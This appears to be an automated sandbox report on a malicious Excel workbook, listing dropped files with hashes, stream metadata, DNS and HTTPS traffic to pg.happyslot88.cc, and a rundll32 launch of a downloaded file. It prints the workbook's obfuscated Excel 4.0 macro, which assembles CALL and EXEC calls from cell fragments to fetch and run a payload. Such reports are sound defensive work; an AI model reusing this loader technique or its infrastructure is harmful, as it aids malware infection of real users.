                SHA-512:A3F1E74FAD036D3A30A3C1E7D8CB1E8F4BC850EB6AC08FF38278ACA61EE41990C7255BFBF23A91F857A55D7D100D3B8FB9CF01D6CD0D2F31842B4AC7FF9B8F04
                Malicious:false
                Reputation:low
                Preview: p...... ....`....f......(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                C:\Users\user\AppData\Local\Temp\71DE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):65815
                Entropy (8bit):7.694630584448929
                Encrypted:false
                SSDEEP:1536:wANiiqSiBjAdwroSgiB9uCbMljf2fu9X9bGi2vKnW+CcT:wU6SOjVuiTuColjf2faNbovSWQT
                MD5:5B13DC3CB9F6E2D5C1D5EA6F503AA3DE
                SHA1:BE0C892A532DEDBC604902A821F13B72CC93B6DF
                SHA-256:5D783871ECEB6ED03B4866B164A04F2AA297867250B4CA5C3B83A76595D4DECB
                SHA-512:C365DDEF314080F0009C8C70DAA41F43ED4645EE356E246AE7337809A2796404ACB10FD25FE8096AF97E574A4D0BB439DBA3A7FC92DEB2E64DA039086CDBBA30
                Malicious:false
                Reputation:low
                Preview: ..N.0...W.."....j.....$....4..?....q..P...J.4m.s.7.t<.\.]<c....U.V..N*.....o...1......1.......c,Hmc...o.h.@..GK+...$....A,.A~>.\p.lB..=.l....Sq.....o.V\m..Q5S&..}.S1WvK..k% Qi...-..-.J.t...L.}@..ELFW>(b....."~..P..B.>T...b.|<.f}..W...mU..60(....t....W.....;......X.J....+.".k.s......I.w..OD..I..F..3...{..?.i......2.7`.e..S...?..#...y...7..........%..P.'......z.p../..._....h$W..W-M.#7...O3..8.. .x8.........p..f.H........1'Q....:........PK..........!...l.............[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Temp\CabDCC9.tmp
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                Category:dropped
                Size (bytes):59134
                Entropy (8bit):7.995450161616763
                Encrypted:true
                SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                MD5:E92176B0889CC1BB97114BEB2F3C1728
                SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                C:\Users\user\AppData\Local\Temp\TarDCCA.tmp
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):152788
                Entropy (8bit):6.316654432555028
                Encrypted:false
                SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                MD5:64FEDADE4387A8B92C120B21EC61E394
                SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Feb 23 02:14:39 2021, atime=Tue Feb 23 02:14:39 2021, length=16384, window=hide
                Category:dropped
                Size (bytes):867
                Entropy (8bit):4.4845695826305105
                Encrypted:false
                SSDEEP:12:85Q3D3rLgXg/XAlCPCHaXtB8XzB/2kxKX+WnicvbSubDtZ3YilMMEpxRljK1TdJU:85o/XTd6jAYepDv3qgrNru/
                MD5:7313B0AC32127A61D8F6BA625F92BE67
                SHA1:CECF8D0E22AAB14DFACDB6C298803087FEEE2398
                SHA-256:A9B9E47C2F5B56D8D1A72C05A9C86C936120D3F0C9D3E037F41FEB51F6B6362E
                SHA-512:9A7CABB727A0F8EF0042E93F5199245017AF22D1B33EFBBB6697279E5DE8A2566F381036ECF35581ADE3214A6B19A7EF0C8452A35841B199C8BF6548104AEB00
                Malicious:false
                Reputation:low
                Preview: L..................F...........7G...?_......?_......@......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....WR....Desktop.d......QK.XWR..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\841618\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......841618..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Heur.15528.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Feb 23 02:14:27 2021, mtime=Tue Feb 23 02:14:39 2021, atime=Tue Feb 23 02:14:39 2021, length=93696, window=hide
                Category:dropped
                Size (bytes):2198
                Entropy (8bit):4.560766324022141
                Encrypted:false
                SSDEEP:48:8R/i/XT0jA+HhHK2XUHhHKBgQh2R/i/XT0jA+HhHK2XUHhHKBgQ/:8R/i/XojA+hK7KBgQh2R/i/XojA+hK7w
                MD5:B508EE36EE01C91C96F6C1F8F86BB0F5
                SHA1:2E9BB64A08A1F1CCB2A2EC331321E6F11F48C251
                SHA-256:EFE6A5BD1E00C12F206EB29289F7B5AFAA12E20AD2B61FE03441FD4CEA72288D
                SHA-512:C01E84249D794FAC8FF9BFA2EB4C138386A8CE9296ADC86FC14C29309AB816E49F8E41FDF35CBACDD75AB437D72B60E5D354FF0A8BBE8135BA8D3AF662DCBE09
                Malicious:false
                Reputation:low
                Preview: L..................F.... ...'.G......?_.....8cf......n...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....WR....Desktop.d......QK.XWR..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..n..WR.. .SECURI~1.XLS..l......WR..WR..*...9&....................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...H.e.u.r...1.5.5.2.8...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\841618\Users.user\Desktop\SecuriteInfo.com.Heur.15528.xls.6.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...H.e.u.r...1.5.5.2.8...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):134
                Entropy (8bit):4.809828785316945
                Encrypted:false
                SSDEEP:3:oyBVomM0bMd2uscbMd2mM0bMd2v:dj60QdnQdo0QdI
                MD5:EE6FA409E8ED43C891798BA77318257D
                SHA1:E9576B630EAE205D4C4C37B178354765D1558791
                SHA-256:98381D63007FDFA63A87B0CE5162CF624FF98525A4B68F5F8C0D992CE569CAFC
                SHA-512:0768E0640E89F2937C88469E88A3CDA14E150D9F4C1E3E4B7B8F3050EA575962A975EBEE3A78681105D3BF624C274AE613E2C7AD1AD06E174417D52BCB094C4C
                Malicious:false
                Reputation:low
                Preview: Desktop.LNK=0..[xls]..SecuriteInfo.com.Heur.15528.LNK=0..SecuriteInfo.com.Heur.15528.LNK=0..[xls]..SecuriteInfo.com.Heur.15528.LNK=0..
                C:\Users\user\Desktop\12DE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Applesoft BASIC program data, first line number 16
                Category:dropped
                Size (bytes):143520
                Entropy (8bit):4.480462866504305
                Encrypted:false
                SSDEEP:3072:oJxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAFVpXUmmJxEtjPOtioVjDGUU1qfDlaG2:ixEtjPOtioVjDGUU1qfDlavx+W2QnAF/
                MD5:EC567F490E9FF7740A5C204A059E8AEE
                SHA1:18D821DB3EC8D6FADE8C29F803D3CFF227606BAC
                SHA-256:DB5E6FC93D92A5397F7C62D64B08BEC11F8934E8BE3180D5F8C16BDD7DBA737B
                SHA-512:95C28F82C84E0D99E2F985B915FD1FC2CDC20E81293327F22485DCD0D2A55649A2E68EE8613761B8A259C95A5B9890C350E3D3960F05D9A61FF15C3771486D0B
                Malicious:false
                Reputation:low
                Preview: ........g2.........................\.p.... B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...........

                Static File Info

                General

                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Feb 22 11:58:55 2021, Security: 0
                Entropy (8bit):3.473104569518557
                TrID:
                • Microsoft Excel sheet (30009/1) 78.94%
                • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                File name:SecuriteInfo.com.Heur.15528.xls
                File size:93696
                MD5:5a75c6184001a6b8785206f1e2121290
                SHA1:b3ec9fbcc5e96c45e74d503210a51a7ee5ce8132
                SHA256:c71bd3833fbb10cd2f845c83a6ed957f3243990de48a74b4d5cf1602303f4bb1
                SHA512:d1d29f02ae53f7fe04ebab4e628d0e30f0f9f4c1bbe58ef3eed9bc3f44d0b2af4b8df2b81fbcd75ba083f77c52a7827cbb6b089382f3d8c9d6aae12bf8cf2760
                SSDEEP:1536:ca7uDphYHceXVhca+fMHLtyeGxcl8O9pTI4XUXmRgb05SXw1OTsRKvoNGrEJcQ:ca7uDphYHceXVhca+fMHLtyeGxcl8O9v
                File Content Preview:........................>......................................................................................................................................................................................................................................

                File Icon

                Icon Hash:e4eea286a4b4bcb4

                Static OLE Info

                General

                Document Type:OLE
                Number of OLE Files:1

                OLE File "SecuriteInfo.com.Heur.15528.xls"

                Indicators

                Has Summary Info:True
                Application Name:Microsoft Excel
                Encrypted Document:False
                Contains Word Document Stream:False
                Contains Workbook/Book Stream:True
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:True

                Summary

                Code Page:1251
                Author:
                Last Saved By:
                Create Time:2006-09-16 00:00:00
                Last Saved Time:2021-02-22 11:58:55
                Creating Application:Microsoft Excel
                Security:0

                Document Summary

                Document Code Page:1251
                Thumbnail Scaling Desired:False
                Contains Dirty Links:False
                Shared Document:False
                Changed Hyperlinks:False
                Application Version:917504

                Streams

                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                General
                Stream Path:\x5DocumentSummaryInformation
                File Type:data
                Stream Size:4096
                Entropy:0.337819969156
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a8 00 00 00 02 00 00 00 e3 04 00 00
                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                General
                Stream Path:\x5SummaryInformation
                File Type:data
                Stream Size:4096
                Entropy:0.250492291218
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . ) ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 83229
                General
                Stream Path:Workbook
                File Type:Applesoft BASIC program data, first line number 16
                Stream Size:83229
                Entropy:3.67638531123
                Base64 Encoded:True
                Data ASCII:. . . . . . . . g 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . .
                Data Raw:09 08 10 00 00 06 05 00 67 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                Macro 4.0 Code

                ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&FORMULA(Doc2!AS110&Doc2!AS111&""2 "",AD15)","=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&FORMULA(Doc2!AT110,AE15)","=FORMULA(Doc2!AV105&Doc2!AV107&Doc2!AV109,AF15)",,,,,,,,,,,,,,,,=AE14(),=before.2.6.28.sheet!AD19(),=AJ19(),,,,,,,,,=before.2.6.28.sheet!AF20(),,,,,,,,,,,,,,,,"=REPLACE(Doc2!AP102&Doc2!AQ102,6,1,before.2.6.28.sheet!AE19)",,,,,,"=REPLACE(Doc2!AT94,6,1,Doc2!AT95)",,"=CALL(AF15,before.2.6.28.sheet!AD21&before.2.6.28.sheet!AD20&before.2.6.28.sheet!AD19&""A"",""JJC""&""CBB"",0,Doc3!A100,""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&Doc2!AT99,0)","=REPLACE(Doc2!AP103,7,7,Doc2!AP101&Doc2!AQ101)",,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&EXEC(before.2.6.28.sheet!AD15&Doc2!AT99&before.2.6.28.sheet!AE15&AJ19)",,,,=AL19(),,=AF17(),"=REPLACE(Doc2!AP104&Doc2!AQ104&Doc2!AR104,7,7,"""")",,=HALT(),,,,,,,=before.2.6.28.sheet!AF14(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Feb 22, 2021 19:15:08.362785101 CET49167443192.168.2.22139.162.8.120
                Feb 22, 2021 19:15:08.588846922 CET44349167139.162.8.120192.168.2.22
                Feb 22, 2021 19:15:08.589133978 CET49167443192.168.2.22139.162.8.120
                Feb 22, 2021 19:15:08.606528044 CET49167443192.168.2.22139.162.8.120
                Feb 22, 2021 19:15:08.829839945 CET44349167139.162.8.120192.168.2.22
                Feb 22, 2021 19:15:08.836025000 CET44349167139.162.8.120192.168.2.22
                Feb 22, 2021 19:15:08.836070061 CET44349167139.162.8.120192.168.2.22
                Feb 22, 2021 19:15:08.836100101 CET44349167139.162.8.120192.168.2.22
                Feb 22, 2021 19:15:08.836255074 CET49167443192.168.2.22139.162.8.120
                Feb 22, 2021 19:15:08.836307049 CET49167443192.168.2.22139.162.8.120
                Feb 22, 2021 19:15:08.853079081 CET49167443192.168.2.22139.162.8.120
                Feb 22, 2021 19:15:09.074079990 CET44349167139.162.8.120192.168.2.22
                Feb 22, 2021 19:15:09.074105978 CET44349167139.162.8.120192.168.2.22
                Feb 22, 2021 19:15:09.074193954 CET49167443192.168.2.22139.162.8.120
                Feb 22, 2021 19:15:10.710575104 CET49167443192.168.2.22139.162.8.120
                Feb 22, 2021 19:15:10.931607008 CET44349167139.162.8.120192.168.2.22
                Feb 22, 2021 19:15:11.475409031 CET44349167139.162.8.120192.168.2.22
                Feb 22, 2021 19:15:11.475595951 CET49167443192.168.2.22139.162.8.120
                Feb 22, 2021 19:15:11.476356030 CET49167443192.168.2.22139.162.8.120
                Feb 22, 2021 19:15:11.485536098 CET44349167139.162.8.120192.168.2.22
                Feb 22, 2021 19:15:11.485574007 CET44349167139.162.8.120192.168.2.22
                Feb 22, 2021 19:15:11.485634089 CET49167443192.168.2.22139.162.8.120
                Feb 22, 2021 19:15:11.485671997 CET49167443192.168.2.22139.162.8.120
                Feb 22, 2021 19:15:11.697278976 CET44349167139.162.8.120192.168.2.22
                Feb 22, 2021 19:15:11.697415113 CET49167443192.168.2.22139.162.8.120

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Feb 22, 2021 19:15:07.982551098 CET5219753192.168.2.228.8.8.8
                Feb 22, 2021 19:15:08.343070984 CET53521978.8.8.8192.168.2.22
                Feb 22, 2021 19:15:09.406263113 CET5309953192.168.2.228.8.8.8
                Feb 22, 2021 19:15:09.471498966 CET53530998.8.8.8192.168.2.22
                Feb 22, 2021 19:15:09.481528044 CET5283853192.168.2.228.8.8.8
                Feb 22, 2021 19:15:09.530570984 CET53528388.8.8.8192.168.2.22
                Feb 22, 2021 19:15:10.121028900 CET6120053192.168.2.228.8.8.8
                Feb 22, 2021 19:15:10.189224005 CET53612008.8.8.8192.168.2.22
                Feb 22, 2021 19:15:10.200612068 CET4954853192.168.2.228.8.8.8
                Feb 22, 2021 19:15:10.252123117 CET53495488.8.8.8192.168.2.22

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Feb 22, 2021 19:15:07.982551098 CET192.168.2.228.8.8.80x80acStandard query (0)pg.happyslot88.ccA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Feb 22, 2021 19:15:08.343070984 CET8.8.8.8192.168.2.220x80acNo error (0)pg.happyslot88.cc139.162.8.120A (IP address)IN (0x0001)

                HTTPS Packets

                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                Feb 22, 2021 19:15:08.836070061 CET139.162.8.120443192.168.2.2249167CN=pg.happyslot88.cc CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Mon Feb 01 08:41:15 CET 2021 Wed Oct 07 21:21:40 CEST 2020Sun May 02 09:41:15 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                Code Manipulations

                Statistics

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:19:14:36
                Start date:22/02/2021
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Imagebase:0x13f190000
                File size:27641504 bytes
                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:19:14:42
                Start date:22/02/2021
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:rundll32 ..\rieuro.vnt,DllRegisterServer
                Imagebase:0xff950000
                File size:45568 bytes
                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis

                Reset < >